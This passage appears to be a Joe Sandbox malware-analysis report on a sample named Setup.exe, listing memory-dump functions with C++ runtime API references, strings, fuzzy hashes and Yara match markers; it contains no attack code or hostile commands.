Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

numpunct.LIBCPMT ref: 031DFEA4
std::_Facet_Register.LIBCPMT ref: 031DFEBB
std::_Lockit::~_Lockit.LIBCPMT ref: 031DFEDB
Concurrency::cancel_current_task.LIBCPMT ref: 031DFEE8

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
String ID:
API String ID: 3064348918-0
Opcode ID: 1bb16466b95430b334dfc01f9733078e0c2c06ed5b56389a54f6f2d0088f2f56
Instruction ID: bae6d319a0a5e8556c327ef329645182374660e49260888c11ea19e5785b4cfe
Opcode Fuzzy Hash: 1bb16466b95430b334dfc01f9733078e0c2c06ed5b56389a54f6f2d0088f2f56
Instruction Fuzzy Hash: E001D23A9002199FCB05EBA8D904ABEB7B5AF4E311F294509D4216F2C0CF749B51CB90

Function 02D6DD74 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 02D6DF43
___std_exception_destroy.LIBVCRUNTIME ref: 02D6DF5D
___std_exception_destroy.LIBVCRUNTIME ref: 02D6E18A
___std_exception_destroy.LIBVCRUNTIME ref: 02D6E1A4

Strings

@PIT6I, xrefs: 02D6E134, 02D6E15A, 02D6E140

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: @PIT6I
API String ID: 4194217158-2369559966
Opcode ID: 9f7c992e4e2b24ed6ebda69c4371158491d9d75bec92deded6937c5c3cbb62ef
Instruction ID: 943a0b57d1b52a24f025dc1befa3e6f6a0d00ec30b1744a53eca2526b8e614e4
Opcode Fuzzy Hash: 9f7c992e4e2b24ed6ebda69c4371158491d9d75bec92deded6937c5c3cbb62ef
Instruction Fuzzy Hash: B6E13770D05298DEDB20DB64C858BEDBBB5AF19300F1481DAD449A7381DB746F88DFA2

Function 031FFEAD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Setup.exe, xrefs: 031FFEC9

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Setup.exe
API String ID: 0-2320538190
Opcode ID: d39641cbae1073b61cd9a451faf81a9d5707721e576198b2f4ad653e49ddc7ca
Instruction ID: 54f9e61115919d85aec2d51bf90f01ca42603f8c903ebf3556d44396be9712ee
Opcode Fuzzy Hash: d39641cbae1073b61cd9a451faf81a9d5707721e576198b2f4ad653e49ddc7ca
Instruction Fuzzy Hash: 6F21DEB6604206AFCB10FF71D88096B77ADAF0E26470549A5FB16CB150EFB0EC5287A0

Function 02D94B98 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D94B9F
_Getvals.LIBCPMT ref: 02D94BFC
_Mpunct.LIBCPMT ref: 02D94C37
_Mpunct.LIBCPMT ref: 02D94C51

Strings

$+xv, xrefs: 02D94C5C

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 10cb20a6054a2dce0b2ccfc42e3b46075c21c850481719e464cd3cbdc7863331
Instruction ID: a0b15d0f6888acceb5f58ec775542249d6a5534708dd3e4172bba105d207179f
Opcode Fuzzy Hash: 10cb20a6054a2dce0b2ccfc42e3b46075c21c850481719e464cd3cbdc7863331
Instruction Fuzzy Hash: 50219EB1904A526EDB25DF74C890B6BBBF9EB08300F04495AE499C7B41D774EA02CFA0

Function 031E33B4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031E33BB
_Getvals.LIBCPMT ref: 031E3418
_Mpunct.LIBCPMT ref: 031E3453
_Mpunct.LIBCPMT ref: 031E346D

Strings

$+xv, xrefs: 031E3478

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 6d4c8d2c8867a9b243834929b826f0435e2209b6efbfa6a5293ae6b0d0b575bb
Instruction ID: 934c1992e7be2f6f8dcb37ddd6f1ee959fff3da9a84338a1f8be9ce7188e3058
Opcode Fuzzy Hash: 6d4c8d2c8867a9b243834929b826f0435e2209b6efbfa6a5293ae6b0d0b575bb
Instruction Fuzzy Hash: 4821B1B6904F456FDB26DF74988076BBBF8AB0D600F044A0AE559CBA40D770E651CB90

Function 02D7EF64 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02D7EFA0
std::_Lockit::_Lockit.LIBCPMT ref: 02D7EFC2
std::_Lockit::~_Lockit.LIBCPMT ref: 02D7EFEA
std::_Facet_Register.LIBCPMT ref: 02D7F0D2
std::_Lockit::~_Lockit.LIBCPMT ref: 02D7F106

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: ed00afb262be88c3f7663a185d82658a320c47b90657c6cc087bd801e9aef877
Instruction ID: 954bb43c087ea9150334f0392cade0f0ed18b9d2db65129669afc1dacaf7cdd9
Opcode Fuzzy Hash: ed00afb262be88c3f7663a185d82658a320c47b90657c6cc087bd801e9aef877
Instruction Fuzzy Hash: 93519970900249CFDB21DFA8C9447EEBBB4EF54314F24416AD415AB380EB79AE45CBA1

Function 031CD780 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 031CD7BC
std::_Lockit::_Lockit.LIBCPMT ref: 031CD7DE
std::_Lockit::~_Lockit.LIBCPMT ref: 031CD806
std::_Facet_Register.LIBCPMT ref: 031CD8EE
std::_Lockit::~_Lockit.LIBCPMT ref: 031CD922

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: d3a2fd7c1c4e5c81d2ec5a3d5262ab7ece6e0e0fce178ffabbc012795b3c781d
Instruction ID: 950787f00c5b5e119621361bbb5bd5aa5139138d33ca3890e095488468b7912f
Opcode Fuzzy Hash: d3a2fd7c1c4e5c81d2ec5a3d5262ab7ece6e0e0fce178ffabbc012795b3c781d
Instruction Fuzzy Hash: 6A51BB74D002899FDB10DFA8E448BAEFBB4FF59310F28816DD405AB280DB74AA41CB91

Function 031BA870 Relevance: 7.6, APIs: 5, Instructions: 133COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 031BA8AD
std::_Lockit::_Lockit.LIBCPMT ref: 031BA8CF
std::_Lockit::~_Lockit.LIBCPMT ref: 031BA8F7
std::_Facet_Register.LIBCPMT ref: 031BA9F1
std::_Lockit::~_Lockit.LIBCPMT ref: 031BAA25

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 139175a351180731619a9deeebc24ded7eb799ae8b31ee6872c9a0415a06e946
Instruction ID: 9e093a767fdaf8bad40dcf2765af242dcb40376ca7db4fcd791bbae99063d8f1
Opcode Fuzzy Hash: 139175a351180731619a9deeebc24ded7eb799ae8b31ee6872c9a0415a06e946
Instruction Fuzzy Hash: C85189B1900249DFDB01DF98D558BEEFBF4FF49314F248099C856AB281DB79AA05CB90

Function 02D7E904 Relevance: 7.6, APIs: 5, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 02D7E941
std::_Lockit::_Lockit.LIBCPMT ref: 02D7E963
std::_Lockit::~_Lockit.LIBCPMT ref: 02D7E98B
std::_Facet_Register.LIBCPMT ref: 02D7EA78
std::_Lockit::~_Lockit.LIBCPMT ref: 02D7EAAC

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: dfaf538290569dc05e644b8cb86ec61e43a05e182fe0bcf0b68eaafb67fe42ed
Instruction ID: e787c446dc4821640c7cde77457f00ce55fd899a57d4a545bdbc377abb0ac7cc
Opcode Fuzzy Hash: dfaf538290569dc05e644b8cb86ec61e43a05e182fe0bcf0b68eaafb67fe42ed
Instruction Fuzzy Hash: 77517871900249DFDB01DF99C9547AEBBB0FF44314F2480AAC445AB380EBB9AE05CBA5

Function 031CD120 Relevance: 7.6, APIs: 5, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 031CD15D
std::_Lockit::_Lockit.LIBCPMT ref: 031CD17F
std::_Lockit::~_Lockit.LIBCPMT ref: 031CD1A7
std::_Facet_Register.LIBCPMT ref: 031CD294
std::_Lockit::~_Lockit.LIBCPMT ref: 031CD2C8

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 519fdd86bf766f2a0d6e2713ce1386da7abc03ee5a939269dfa13f1143b5c617
Instruction ID: d5609539498020945d407938a2fba13a572ba4de5ed377706900ddbce449536a
Opcode Fuzzy Hash: 519fdd86bf766f2a0d6e2713ce1386da7abc03ee5a939269dfa13f1143b5c617
Instruction Fuzzy Hash: E051ADB4900289DFDB01DF98E548BAEBBF4FF59314F1480ADD805AB280DB75AA05CB91

Function 02D8BD30 Relevance: 7.6, APIs: 5, Instructions: 94COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D8BD37
std::_Lockit::_Lockit.LIBCPMT ref: 02D8BD41
std::_Lockit::~_Lockit.LIBCPMT ref: 02D8BDE8
Concurrency::cancel_current_task.LIBCPMT ref: 02D8BDF3
__EH_prolog3.LIBCMT ref: 02D8BE00

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: H_prolog3Lockitstd::_$Concurrency::cancel_current_taskLockit::_Lockit::~_
String ID:
API String ID: 845066630-0
Opcode ID: 1278c62e2be01328abe0d5daedff56afb5df192ab029ccd6b1381350976716ef
Instruction ID: 89d38d56b183511ee277baac58d455ebb9e9e47f2727c71e5e4c0dd4796ce4bc
Opcode Fuzzy Hash: 1278c62e2be01328abe0d5daedff56afb5df192ab029ccd6b1381350976716ef
Instruction Fuzzy Hash: 18319C31A0061AEFCB04FF54C890AACB7B6FF04314F44845AE916AB3A0DB71AD41CFA4

Function 02D8BBEB Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D8BBF2
std::_Lockit::_Lockit.LIBCPMT ref: 02D8BBFC

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D8BC4D
std::_Lockit::~_Lockit.LIBCPMT ref: 02D8BC6D
Concurrency::cancel_current_task.LIBCPMT ref: 02D8BC7A

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: e885901236ee3d20e9bf03ba2b5ae3083cb32e45f5f688de0d4d5f3c7b5cafa5
Instruction ID: d7d6f906b6882d029d99d06dace36bd953e281471fc40ba62bae29e0bb320869
Opcode Fuzzy Hash: e885901236ee3d20e9bf03ba2b5ae3083cb32e45f5f688de0d4d5f3c7b5cafa5
Instruction Fuzzy Hash: EC11E6719001199BCB05BB68D9506FEBBA6EF94314F24801FE904A73D0DFB59D02CBE9

Function 031DCB11 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 031DCB31
_Maklocstr.LIBCPMT ref: 031DCB4E
_Maklocstr.LIBCPMT ref: 031DCB6B
_Maklocchr.LIBCPMT ref: 031DCB7D
_Maklocchr.LIBCPMT ref: 031DCB90

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: 70c8002c43a465c9065076977c3bd917ba7b67ef8b2c7f10bfb4e3db6e728f83
Instruction ID: 6244785a512823f89a33b5141eb11d70bc54848ae8e542fae95984c1e9f75d1a
Opcode Fuzzy Hash: 70c8002c43a465c9065076977c3bd917ba7b67ef8b2c7f10bfb4e3db6e728f83
Instruction Fuzzy Hash: 2E116AB5544B84BBE720DBA59C80F12BBA8EF0A750F18491AE2898BA40D364F850C7E5

Function 031DA407 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 031DA40E
std::_Lockit::_Lockit.LIBCPMT ref: 031DA418

Part of subcall function 031A7C30: std::_Lockit::_Lockit.LIBCPMT ref: 031A7C65
Part of subcall function 031A7C30: std::_Lockit::~_Lockit.LIBCPMT ref: 031A7C8F

std::_Facet_Register.LIBCPMT ref: 031DA469
std::_Lockit::~_Lockit.LIBCPMT ref: 031DA489
Concurrency::cancel_current_task.LIBCPMT ref: 031DA496

Memory Dump Source

Source File: 00000000.00000002.2280161167.00000000031A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a1000_Setup.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: e618431a33ac3f13cd0dbda19f603ec9fa1a010415f354d470e350a9309f679c
Instruction ID: 0361d4eb0ab686051fc6ce6901634694e790cb0c1c8bb7c760d041a56367e78e
Opcode Fuzzy Hash: e618431a33ac3f13cd0dbda19f603ec9fa1a010415f354d470e350a9309f679c
Instruction Fuzzy Hash: 9A01B9399003199FCB05FBA8D5186BEF7B5AF5D310F188409D4116F2C0DFB49A45CB91

Function 02D913E9 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D913F0
std::_Lockit::_Lockit.LIBCPMT ref: 02D913FA

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9144B
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9146B
Concurrency::cancel_current_task.LIBCPMT ref: 02D91478

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: f88dfebad10287a4defde860b515dcd786054964d8cfb5166312b2718a760271
Instruction ID: a38873b3b713ba6abd673a414d634c24a0f5b8109a37b58c7e5d0c24b6cf0e36
Opcode Fuzzy Hash: f88dfebad10287a4defde860b515dcd786054964d8cfb5166312b2718a760271
Instruction Fuzzy Hash: 8001C0319001169BCF05FBA4C9546BDBBA2EF88314F24451EE91567390DF74DE01CFA5

Function 02D917FE Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D91805
std::_Lockit::_Lockit.LIBCPMT ref: 02D9180F

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D91860
std::_Lockit::~_Lockit.LIBCPMT ref: 02D91880
Concurrency::cancel_current_task.LIBCPMT ref: 02D9188D

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 675f38d947f0376a6a9fd613c7dbac5a9fa932d0485fbea17c43fb2f9696aaa2
Instruction ID: 870d013d54c1a59ced218018b4822ee3b90c95febe0aeda5d18f6f2415696843
Opcode Fuzzy Hash: 675f38d947f0376a6a9fd613c7dbac5a9fa932d0485fbea17c43fb2f9696aaa2
Instruction Fuzzy Hash: 3901C0319001269BCF05EBA4C954ABDBBA2EF84310F24451EE81567390DF75DE01DFA5

Function 02D91769 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D91770
std::_Lockit::_Lockit.LIBCPMT ref: 02D9177A

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D917CB
std::_Lockit::~_Lockit.LIBCPMT ref: 02D917EB
Concurrency::cancel_current_task.LIBCPMT ref: 02D917F8

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 37e68311f6d57c2f6baeb3aeea3b727baa68b0dc06cc5ce739548e93bac73224
Instruction ID: d64b41bb2cfb99ca1147e5b9b5e615f15c8e7e15c826d9e3f06d2d050cd6225b
Opcode Fuzzy Hash: 37e68311f6d57c2f6baeb3aeea3b727baa68b0dc06cc5ce739548e93bac73224
Instruction Fuzzy Hash: 1901AD31900116DBCF05EBA8C9546FEBBA6EF84320F25401EE81567390DF759E01CBA5

Function 02D9147E Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D91485
std::_Lockit::_Lockit.LIBCPMT ref: 02D9148F

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D914E0
std::_Lockit::~_Lockit.LIBCPMT ref: 02D91500
Concurrency::cancel_current_task.LIBCPMT ref: 02D9150D

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 804398b03e12a0bd796a447e550a1c8dd02561147155cacf005e8532159e193b
Instruction ID: d249a6e3d9acdce3d26649b2436042f11a916cb0605ffda51d1e0a8734d14a21
Opcode Fuzzy Hash: 804398b03e12a0bd796a447e550a1c8dd02561147155cacf005e8532159e193b
Instruction Fuzzy Hash: 0E0180319001269BCF05EBA4D954ABDBBB2EF88310F25451EE81567390DFB5DE01CFA5

Function 02D915A8 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D915AF
std::_Lockit::_Lockit.LIBCPMT ref: 02D915B9

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9160A
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9162A
Concurrency::cancel_current_task.LIBCPMT ref: 02D91637

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 98f7f921751a3fa6cd3b5dd8abab2d56fa6d955cd07a05b3119b5d89abd43b57
Instruction ID: c379d3a180e6b0fcb1bfc1fc8d262ee2f7bca845d7f05aedc9c0b621388d0bc0
Opcode Fuzzy Hash: 98f7f921751a3fa6cd3b5dd8abab2d56fa6d955cd07a05b3119b5d89abd43b57
Instruction Fuzzy Hash: DF018B319001569BCF05EBA8C950ABDBBB2EF84310F29451AE815AB390DB75DE02CBA5

Function 02D91513 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9151A
std::_Lockit::_Lockit.LIBCPMT ref: 02D91524

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D91575
std::_Lockit::~_Lockit.LIBCPMT ref: 02D91595
Concurrency::cancel_current_task.LIBCPMT ref: 02D915A2

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 0f9b3098ba0abb1f302c3e30f2f7053481ab468a763fa86ef2b6939a19c5afce
Instruction ID: b16ff58fc9ac8ffb682fd564032b3800c60ff8546cc1b193ebd3a4ad5b041bb8
Opcode Fuzzy Hash: 0f9b3098ba0abb1f302c3e30f2f7053481ab468a763fa86ef2b6939a19c5afce
Instruction Fuzzy Hash: 65018B319001269BCF05EBA8D9546BDBBB2EF84320F25401AE8166B390DF74DE01CFA5

Function 02D9CA71 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CA78
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CA82

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9CAD3
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CAF3
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CB00

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 639d1d645853516698945927b33989c09dae6e9180eac5537ae4362a97d3cb4f
Instruction ID: 596a70c2e5e6a8943f89fdbabbbda415bb6f4a52b65d342e234cb86385826232
Opcode Fuzzy Hash: 639d1d645853516698945927b33989c09dae6e9180eac5537ae4362a97d3cb4f
Instruction Fuzzy Hash: D001D2319101268BCF05FBA4C9506BDBBB2EF88310F25411EE51567390DFB49E01CFA9

Function 02D90BC3 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D90BCA
std::_Lockit::_Lockit.LIBCPMT ref: 02D90BD4

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D90C25
std::_Lockit::~_Lockit.LIBCPMT ref: 02D90C45
Concurrency::cancel_current_task.LIBCPMT ref: 02D90C52

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 0738cdd6fba0820bcb5a3a780152cc918a7f3494287506520769711e61079fdb
Instruction ID: 8197f446f8b70e4f51aa5338cba02281c3f3086e9e8894b1698ca1fa7122740d
Opcode Fuzzy Hash: 0738cdd6fba0820bcb5a3a780152cc918a7f3494287506520769711e61079fdb
Instruction Fuzzy Hash: 1401D232900125CBCF09EBA4D9506BDBBB2EF84311F24851EE9156B380DF759E05CFA5

Function 02D9CB9B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 02D9CBA2
std::_Lockit::_Lockit.LIBCPMT ref: 02D9CBAC

Part of subcall function 02D59414: std::_Lockit::_Lockit.LIBCPMT ref: 02D59449
Part of subcall function 02D59414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D59473

std::_Facet_Register.LIBCPMT ref: 02D9CBFD
std::_Lockit::~_Lockit.LIBCPMT ref: 02D9CC1D
Concurrency::cancel_current_task.LIBCPMT ref: 02D9CC2A

Memory Dump Source

Source File: 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d50000_Setup.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
String ID:
API String ID: 55977855-0
Opcode ID: 8343ed92cb4aef7ac189aca32d12298d97e0ad3b05bfa153ade5190a798e4b4b
Instruction ID: 2fbfefa467e2047cd4a636351e8feb7e4de48fe02f32dc49072f098f531f51cb
Opcode Fuzzy Hash: 8343ed92cb4aef7ac189aca32d12298d97e0ad3b05bfa153ade5190a798e4b4b
Instruction Fuzzy Hash: 6101C0329101169BCF05FBA4C9506BDBBB2EF88310F24451EE81667390DF799E01CFA5

Function 02D90B2E Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

